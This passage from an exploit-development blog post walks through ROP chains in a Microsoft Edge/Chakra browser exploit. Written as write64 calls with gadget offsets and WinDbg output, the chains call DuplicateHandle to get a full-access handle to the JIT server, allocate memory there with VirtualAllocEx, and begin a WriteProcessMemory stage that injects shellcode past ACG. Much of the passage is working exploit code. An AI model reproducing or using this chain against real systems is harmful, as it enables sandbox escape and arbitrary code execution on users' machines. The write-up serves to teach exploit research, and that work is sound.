write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

This brings our DuplicateHandle call to the following state:

	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process

The next ROP gadget sequence contains an interesting item. The next item on our agenda will be to provide DuplicateHandle with an β€œoutput buffer” to write the new duplicated-handle (when the call to DuplicateHandle occurs). We achieve this by providing a memory address, which is writable, in R9. The address we will use is an empty address within the .data section of chakra.dll. We achieve this with the following ROP gadget:

mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret

As we can see, we load the address we want to place in R9 within RCX. The mov r9, rcx instruction will load our intended β€œoutput buffer” within R9, setting up our call to DuplicateHandle properly. However, there are some residual instructions we need to deal with - most notably the cmp r8d, [rax] instruction. As we can see, this instruction will dereference RAX (e.g. extract the contents that the value in RAX points to) and compare it to r8d. We don’t necessarily care about the cmp instruction so much as we do about the fact that RAX is dereferenced. This means in order for this ROP gadget to work properly, we need to load a valid pointer in RAX. In this exploit, we just choose a random address within the chakra.dll address space. Do not over think as to β€œwhy did Connor choose this specific address”. This could literally be any address!

As we can see, RAX now has a valid pointer in it. Moving our, our next ROP gadget is a pop rcx ; ret gadget. As previously mentioned, we load the actual value we want to pass into DuplicateHandle via the R9 register into RCX. A future ROP gadget will copy RCX into the R9 register.

Our .data address of chakra.dll is loaded into RCX. This memory address is where our PROCESS_ALL_ACCESS handle to the JIT server will be located after our call to DuplicateHandle.

Now that we have prepared RAX with a valid pointer and prepared RCX with the address we want DuplicateHandle to write our PROCESS_ALL_ACCESS handle to, we hit the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget.

We have successfully copied our output β€œbuffer”, which will hold our full-permissions handle to the JIT server after the DuplicateHandle call into R9. Next up, we can see the cmp r8d, dword ptr [rax] instruction. WinDbg now shows that the dereferenced contents of RAX contains some valid contents - meaning RAX was successfully prepared with a pointer to β€œbypass” this cmp check. Essentially, we ensure we don’t incur an access violation as a result of an invalid address being dereferenced by RAX.

The next item on the agenda is the je instruction - which essentially performs the jump to the specified address above (chakra!Js::InternalStringComparer::Equals+0x28) if the result of subtracting EAX, a 32-bit register (referenced via dword ptr [rax], meaning essentially EAX) from R8D (a 32-bit register) is 0. As we know, we already prepared R8 with a value of 0xffffffffffffffff - meaning the jump won’t take place, as 0xffffffffffffffff - 0x7fff3d82e010 does not equal zero. After this, an add rsp, 0x28 instruction occurs - and, as we saw in our ROP gadget snippet at the beginning of this section of the blog, we pad the stack with 0x28 bytes to ensure execution returns into the next ROP gadget, and not into something we don’t intend it to (e.g. 0x28 bytes β€œdown” the stack without any padding).

Our call to DuplicateHandle is now at the following state:

	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server

Since RDX, R8, and R9 are taken care of - we can finally fill in RCX with the handle to the JIT server that is currently within the s_jitManager. This is an β€œeasy” ROP sequence - as the handle is stored in a global variable s_jitManager + 0x8 and we can just place it on the stack and pop it into RCX with a pop rcx ; ret gadget. We have already used our arbitrary read to leak the raw handle value (in this case it is 0xa64, but is subject to change on a per-process basis).

You may notice above the value of the stack changed. This is simply because I restarted Edge, and as we know - the stack changes on a per-process basis. This is not a big deal at all - I just wanted to make note to the reader.

After the pop rcx instruction - the PROCESS_DUP_HANDLE handle to the JIT server is stored in RCX.

Our call to DuplicateHandle is now at the following state:

	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server

Per the __fastcall calling convention, every argument after the first four are placed onto the stack. Because we have an arbitrary write primitive, we can just directly write our next 3 arguments for DuplicateHandle to the stack - we don’t need any ROP gadgets to pop any further arguments. With this being said, we will go ahead and continue to use our ROP chain to actually place DuplicateHandle into the RAX register. We then will perform a jmp rax instruction to kick our function call off. So, for now, let’s focus on getting the address of kernelbase!DuplicateHandle into RAX. This begins with a pop rax instruction. As we can see below, RAX, after the pop rax, contains kernelbase!DuplicateHandle.

After RAX is filled with kernelbase!DuplicateHandle, the jmp rax instruction is queued for execution.

Let’s quickly recall our ROP chain snippet.

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

Let’s break down what we are seeing above:

  1. RAX contains kernelbase!DuplicateHandle
  2. kernelbase!DuplicateHandle is a function. When it is called legitimately, it ends in a ret instruction to return execution to where it was called (this is usually a return to the stack)
  3. Our β€œreturn” address jumps over our β€œshadow space”. Remember, __fastcall requires the 5th parameter, and subsequent parameters, begin at RSP + 0x20, RSP + 0x28, RSP + 0x38, etc. The space between RSP and RSP + 0x20, which is unused, is referred to as β€œshadow space”
  4. Our final three parameters are written directly to the stack

Step one is very self explanatory. Let’s explain steps two through four quickly. When DuplicateHandle is called legitimately, execution can be seen below.

Prior to the call:

After the call:

Notice what our call instruction does under the hood. call pushes the return address on the stack for DuplicateHandle. When this push occurs, it also changes the state of the stack so that every item is pushed down 0x8 bytes. Essentially, when call happens RSP becomes RSP + 0x8, and so forth. This is very important to us.

Recall that we do not actually call DuplicateHandle. Instead, we perform a jmp to it. Since we are using jmp, this doesn’t push a return address onto the stack for execution to return to. Because of this, we supply our own return address located at RSP when the jmp occurs - this β€œmimics” what call does. Additionally, this also means we have to push our last three parameters 0x8 bytes down the stack. Again, call would normally do this for us - but since call isn’t used here, we have to manually add our return address an manually increment the stack by 0x8. This is because although __fastcall requires 5th and subsequent parameters to start at RSP + 0x20, internally the calling convention knows when the call is performed, the parameters will actually be shifted by 0x8 bytes due to the pushed ret address on the stack. So tl;dr - although __fastcall says we put parameters at RSP + 0x20, we actually need to start them at RSP + 0x28.

The above will be true for all subsequent ROP chains.

So, after we get DuplicateHandle into RAX we then can directly write our final three arguments directly to the stack leveraging our arbitrary write primitive.

Our call to DuplicateHandle is in its final state:

	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS

From here, we should be able to step into the function call to DuplicateHandle, execute it.

We can use pt to tell WinDbg to execute DuplicateHandle and pause when we hit the ret to exit the function

At this point, our call should have been successful! As we see above, a value was placed in our β€œoutput buffer” to receive the duplicated handle. This value is 0x0000000000000ae8. If we run Process Hacker as an administrator, we can confirm that this is a handle to the JIT server with PROCESS_ALL_ACCESS!

Now that our function has succeeded, we need to make sure we return back to the stack in a manner that allows us to keep execution our ROP chain.

When the ret is executed we hit our β€œfake return address” we placed on the stack before the call to DuplicateHandle. Our return address will simply jump over the shadow space and our last three DuplicateHandle parameters, and allow us to keep executing further down the stack (where subsequent ROP chains will be).

At this point we have successfully obtained a PROCESS_ALL_ACCESS handle to the JIT server process. With this handle, we can begin the process of compromising the JIT process, where ACG is disabled.

VirtualAllocEx ROP Chain

Now that we possess a handle to the JIT server with enough permissions to perform things like memory operations, let’s now use this PROCESS_ALL_ACCESS handle to allocate some memory within the JIT process. However, before examining the ROP chain, let’s recall the prototype for VirtualAllocEx:

The function call will be as follows for us:

	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable

Let’s firstly break down why our call to VirtualAllocEx is constructed the way it is. The call to the function is very straight forward - we are essentially allocating a region of memory the size of our shellcode in the JIT process using our new handle to the JIT process. The main thing that sticks out to us is the PAGE_READWRITE allocation protection. As we recall, the JIT process doesn’t have ACG enabled - meaning it is quite possible to have dynamic RWX memory in such a process. However, there is a slight caveat and that is when it comes to remote injection. ACG is documented to let processes that don’t have ACG enabled to inject RWX memory into a process which does have ACG enabled. After all, ACG was created with Microsoft Edge in mind. Since Edge uses an out-of-process JIT server architecture, it would make sense that the process not protected by ACG (the JIT server) can inject into the process with ACG (the content process). However, a process with ACG cannot inject into a process without ACG using RWX memory. Because of this, we actually will place our shellcode into the JIT server using RW permissions. Then, we will eventually copy a ROP chain into the JIT process which marks the shellcode as RWX. This is possible, as ACG is disabled. The main caveat here is that it cannot directly and remotely be marked as RWX. At first, I tried allocating with RWX memory, thinking I could just do simple process injection. However, after testing and the API call failing, it turns our RWX memory can’t directly be allocated when the injection stems from a process protected by ACG to a non-ACG process. This will all make more sense later, if it doesn’t now, when we copy our ROP chain in to the JIT process.

Here is the ROP chain we will be working with (we will include our DuplicateHandle chain for continuity. Every ROP chain from here on out will be included with the previous one to make readability a bit better):

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

Let’s start by setting a breakpoint on our first ROP gadget of pop rax ; ret, which is located at chakra_base + 0x577fd4. Our DuplicateHandle ROP chain uses this gadget two times. So, when we hit our breakpoint, we will hit g in WinDbg to jump over these two calls in order to debug our VirtualAllocEx ROP chain.

This ROP chain starts out by attempting to act on the R9 register to load in the flAllocationType parameter. This is done via the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget. As we previously discussed, the RCX register is used to copy the final parameter into R9. This means we need to place MEM_COMMIT | MEM_RESERVE into the RCX register, and let our target gadget copy the value into R9. However, we know that the RAX register is dereferenced. This means our first few gadgets:

  1. Place a valid pointer in RAX to bypass the cmp r8d, [rax] check
  2. Place 0x3000 (MEM_COMMIT | MEM_RESERVE) into RCX
  3. Copy said value in R9 (along with an add rsp, 0x28 which we know how to deal with by adding 0x28 bytes of padding)

Our call to VirtualAllocEx is now in the following state:

	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go

After R9 gets filled properly, our next step is to work on the dwSize parameter, which will go in R8. We can directly copy a value into R8 using the following ROP gadget: mov r8, rdx ; add rsp, 0x48 ; ret. All we have to do is place our intended value into RDX prior to this gadget, and it will be copied into R8 (along with an add rsp, 0x48 - which we know how to deal with by adding some padding before our ret). The value we are going to place in R9 is 0x1000 which isn’t the exact size of our shellcode, but it will give us a good amount of space to work with as 0x1000 is more room than we actually need.

Our call to VirtualAllocEx is now in the following state:

	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go

The next parameter we will focus on is the lpAddress parameter. In this case, we are setting this value to NULL (or 0 in our case), as we want the OS to determine where our private allocation will be within the JIT process. This is done by simply popping a 0 value, which we can directly write to the stack after our pop rdx gadget using the write primitive, into RDX.

After executing the above ROP gadgets, our call to VirtualAllocEx is in the following state:

	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go

At this point we have supplied 3/5 arguments for VirtualAllocEx. Our second-to-last parameter will be the hProcess parameter - which is our now duplicated-handle to the JIT server with PROCESS_ALL_ACCESS permissions. Here is how this code snippet looks:

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

We can notice two things here - recall we stored the handle in an empty address within .data of chakra.dll. We simply can pop this pointer into RCX, and then dereference it to get the raw handle value. This arbitrary dereference gadget, where we can extract the value RCX points to, is followed by a write operation at the memory address in RAX + 0x20. Recall we already have placed a writable address into RAX, so we simply can move on knowing we β€œbypass” this instruction, as the write operation won’t cause an access violation - the memory in RAX is already writable.

Our call to VirtualAllocEx is now in the following state:

	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go

The last thing we need to do is twofold:

  1. Place VirtualAllocEx into RAX
  2. Directly write our last parameter at RSP + 0x28 (we have already explained why RSP + 0x28 instead of RSP + 0x20) (this is done via our arbitrary write and not via a ROP gadget)
  3. jmp rax to kick off the call to VirtualAllocEx

Again, as a point of reiteration, we can see we simply can just write our last parameter to RSP + 0x28 instead of using a gadget to mov [rsp+0x28], reg.

write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)

When this occurs, our call will be in the following (final) state:

	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable

We can step into the jump with t and then use pt to hit the ret of VirtualAllocEx. At this point, as is generally true in assembly, RAX should contain the return value of VirtualAllocEx - which should be a pointer to a block of memory within the JIT process, size 0x1000, and RW.

If we try to examine this address within the debugger, we will see it is invalid memory.

However, if we attach a new WinDbg session (without closing out the current one) to the JIT process (we have already shown multiple times in this blog post how to identify the JIT process) we can see this memory is committed.

As we can see, our second ROP chain was successful and we have allocated a page of RW memory within the JIT process. We will eventually write our shellcode into this allocation and use a final-stage ROP chain we will inject into the JIT process to mark this region as RWX.

WriteProcessMemory ROP Chain

At this point in our exploit, we have seen our ability to control memory within the remote JIT process - where ACG is disabled. As previously shown, we have allocated memory within the JIT process. Additionally, towards the beginning of the blog, we have stored our shellcode in the .data section of chakra.dll (see β€œShellcode” section). We know this shellcode will never become executable in the current content process (where our exploit is executing) - so we need to inject it into the JIT process, where ACG is disabled. We will setup a call to WriteProcessMemory in order to write our shellcode into our new allocation within the JIT server.

Here is how our call to WriteProcessMemory will look:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode)				// Size of our shellcode
	NULL 						// Optional

Here is the instrumentation of our ROP chain (including DuplicateHandle and VirtualAllocEx for continuity purposes):

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

